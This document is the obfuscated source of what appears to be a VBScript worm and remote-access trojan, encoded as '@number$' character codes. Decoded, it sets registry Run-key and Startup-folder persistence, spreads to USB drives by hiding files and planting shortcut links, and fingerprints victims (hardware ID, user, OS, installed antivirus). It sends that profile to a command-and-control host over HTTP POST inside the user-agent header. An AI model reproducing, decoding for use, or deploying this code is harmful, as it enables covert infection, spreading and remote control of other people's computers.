@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@175$@184$@181$@173$@174$@187$@165$@173$@174$@175$@170$@190$@181$@189$@178$@172$@184$@183$@165$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@117$@107$@117$@107$@114$@105$@134$@105$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@184$@181$@173$@174$@187$@119$@185$@170$@189$@177$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@188$@170$@191$@174$@113$@114$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@183$@173$@105$@146$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@187$@187$@119$@172$@181$@174$@170$@187$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@188$@190$@171$@105$@190$@183$@178$@183$@188$@189$@170$@181$@181$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@173$@174$@181$@174$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@173$@174$@181$@174$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@175$@187$@174$@174$@188$@185$@170$@172$@174$@105$@105$@135$@105$@121$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@105$@134$@105$@122$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@105$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@114$@119$@175$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@114$@105$@133$@135$@105$@107$@181$@183$@180$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@121$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@190$@172$@170$@188$@174$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@105$@133$@135$@105$@190$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@134$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@113$@121$@114$@105$@111$@105$@107$@119$@181$@183$@180$@107$@105$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@146$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@174$@181$@174$@189$@174$@175$@178$@181$@174$@105$@113$@175$@178$@181$@174$@119$@185$@170$@189$@177$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@121$@86$@83$@105$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@185$@184$@188$@189$@105$@113$@172$@182$@173$@105$@117$@185$@170$@187$@170$@182$@114$@86$@83$@86$@83$@185$@184$@188$@189$@105$@134$@105$@185$@170$@187$@170$@182$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@187$@189$@105$@111$@107$@120$@107$@105$@111$@105$@172$@182$@173$@117$@105$@175$@170$@181$@188$@174$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@189$@187$@174$@186$@190$@174$@188$@189$@177$@174$@170$@173$@174$@187$@105$@107$@190$@188$@174$@187$@118$@170$@176$@174$@183$@189$@131$@107$@117$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@188$@174$@183$@173$@105$@185$@170$@187$@170$@182$@86$@83$@185$@184$@188$@189$@105$@134$@105$@177$@189$@189$@185$@184$@171$@179$@119$@187$@174$@188$@185$@184$@183$@188$@174$@189$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@178$@175$@105$@105$@178$@183$@175$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@177$@192$@178$@173$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@172$@184$@182$@185$@190$@189$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@190$@188$@174$@187$@183$@170$@182$@174$@110$@107$@114$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@114$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@188$@178$@183$@175$@184$@105$@178$@183$@105$@184$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@184$@188$@178$@183$@175$@184$@119$@172$@170$@185$@189$@178$@184$@183$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@105$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@107$@185$@181$@190$@188$@107$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@111$@105$@188$@185$@181$@178$@189$@174$@187$@86$@83$@105$@105$@105$@105$@178$@183$@175$@105$@134$@105$@178$@183$@175$@105$@111$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@105$@105$@86$@83$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@178$@183$@175$@184$@187$@182$@170$@189$@178$@184$@183$@105$@134$@105$@178$@183$@175$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@190$@185$@188$@189$@170$@187$@189$@105$@113$@114$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@151$@174$@193$@189$@86$@83$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@140$@158$@155$@155$@142$@151$@157$@168$@158$@156$@142$@155$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@182$@178$@172$@187$@184$@188$@184$@175$@189$@165$@192$@178$@183$@173$@184$@192$@188$@165$@172$@190$@187$@187$@174$@183$@189$@191$@174$@187$@188$@178$@184$@183$@165$@187$@190$@183$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@117$@105$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@188$@189$@170$@187$@189$@190$@185$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@189$@187$@190$@174$@86$@83$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@177$@192$@178$@173$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@189$@105$@187$@184$@184$@189$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@173$@178$@188$@180$@188$@105$@134$@105$@187$@184$@184$@189$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@105$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@181$@184$@176$@178$@172$@170$@181$@173$@178$@188$@180$@107$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@178$@188$@180$@105$@178$@183$@105$@173$@178$@188$@180$@188$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@105$@133$@135$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@177$@192$@178$@173$@105$@134$@105$@173$@178$@188$@180$@119$@191$@184$@181$@190$@182$@174$@188$@174$@187$@178$@170$@181$@183$@190$@182$@171$@174$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@183$@174$@193$@189$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@188$@174$@172$@190$@187$@178$@189$@194$@105$@134$@105$@107$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@196$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@178$@184$@183$@181$@174$@191$@174$@181$@134$@178$@182$@185$@174$@187$@188$@184$@183$@170$@189$@174$@198$@106$@165$@165$@119$@165$@187$@184$@184$@189$@165$@172$@178$@182$@191$@123$@107$@114$@86$@83$@188$@174$@189$@105$@172$@184$@181$@178$@189$@174$@182$@188$@105$@134$@105$@184$@171$@179$@192$@182$@178$@188$@174$@187$@191$@178$@172$@174$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@192$@178$@183$@124$@123$@168$@184$@185$@174$@187$@170$@189$@178$@183$@176$@188$@194$@188$@189$@174$@182$@107$@117$@117$@125$@129$@114$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@178$@189$@174$@182$@105$@178$@183$@105$@172$@184$@181$@178$@189$@174$@182$@188$@86$@83$@105$@105$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@184$@171$@179$@178$@189$@174$@182$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@183$@174$@193$@189$@86$@83$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@172$@184$@181$@178$@189$@174$@182$@188$@119$@191$@174$@187$@188$@178$@184$@183$@117$@107$@119$@107$@114$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@121$@114$@105$@111$@105$@107$@119$@107$@86$@83$@175$@184$@187$@105$@105$@193$@105$@134$@105$@122$@105$@189$@184$@105$@190$@171$@184$@190$@183$@173$@105$@113$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@114$@86$@83$@82$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@111$@105$@105$@191$@174$@187$@188$@178$@184$@183$@188$@189$@187$@105$@113$@178$@114$@86$@83$@183$@174$@193$@189$@86$@83$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@134$@105$@174$@191$@170$@181$@105$@113$@184$@188$@191$@174$@187$@188$@178$@184$@183$@114$@86$@83$@178$@175$@105$@105$@184$@188$@191$@174$@187$@188$@178$@184$@183$@105$@135$@105$@127$@105$@189$@177$@174$@183$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@123$@107$@105$@174$@181$@188$@174$@105$@188$@172$@105$@134$@105$@107$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@107$@86$@83$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@105$@134$@105$@176$@174$@189$@184$@171$@179$@174$@172$@189$@113$@107$@192$@178$@183$@182$@176$@182$@189$@188$@131$@165$@165$@181$@184$@172$@170$@181$@177$@184$@188$@189$@165$@187$@184$@184$@189$@165$@107$@105$@111$@105$@188$@172$@114$@86$@83$@156$@174$@189$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@134$@105$@184$@171$@179$@188$@174$@172$@190$@187$@178$@189$@194$@172$@174$@183$@189$@174$@187$@119$@174$@193$@174$@172$@186$@190$@174$@187$@194$@113$@107$@188$@174$@181$@174$@172$@189$@105$@115$@105$@175$@187$@184$@182$@105$@170$@183$@189$@178$@191$@178$@187$@190$@188$@185$@187$@184$@173$@190$@172$@189$@107$@117$@107$@192$@186$@181$@107$@117$@121$@114$@86$@83$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@105$@178$@183$@105$@172$@184$@181$@170$@183$@189$@178$@191$@178$@187$@190$@188$@86$@83$@105$@105$@105$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@111$@105$@184$@171$@179$@170$@183$@189$@178$@191$@178$@187$@190$@188$@119$@173$@178$@188$@185$@181$@170$@194$@183$@170$@182$@174$@105$@111$@105$@107$@105$@119$@107$@86$@83$@183$@174$@193$@189$@86$@83$@178$@175$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@105$@188$@174$@172$@190$@187$@178$@189$@194$@105$@105$@134$@105$@107$@183$@170$@183$@118$@170$@191$@107$@86$@83$@174$@183$@173$@105$@175$@190$@183$@172$@189$@178$@184$@183$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@111$@105$@107$@165$@107$@114$@86$@83$@178$@175$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@178$@175$@105$@181$@172$@170$@188$@174$@105$@113$@105$@182$@178$@173$@113$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@117$@123$@114$@114$@105$@134$@105$@107$@131$@165$@107$@105$@111$@105$@105$@181$@172$@170$@188$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@189$@187$@190$@174$@105$@118$@105$@107$@105$@111$@105$@173$@170$@189$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@192$@187$@178$@189$@174$@105$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@107$@105$@111$@105$@188$@185$@181$@178$@189$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@119$@107$@114$@113$@121$@114$@105$@105$@111$@105$@107$@165$@107$@117$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@117$@105$@107$@155$@142$@144$@168$@156$@163$@107$@86$@83$@105$@105$@105$@174$@181$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@175$@170$@181$@188$@174$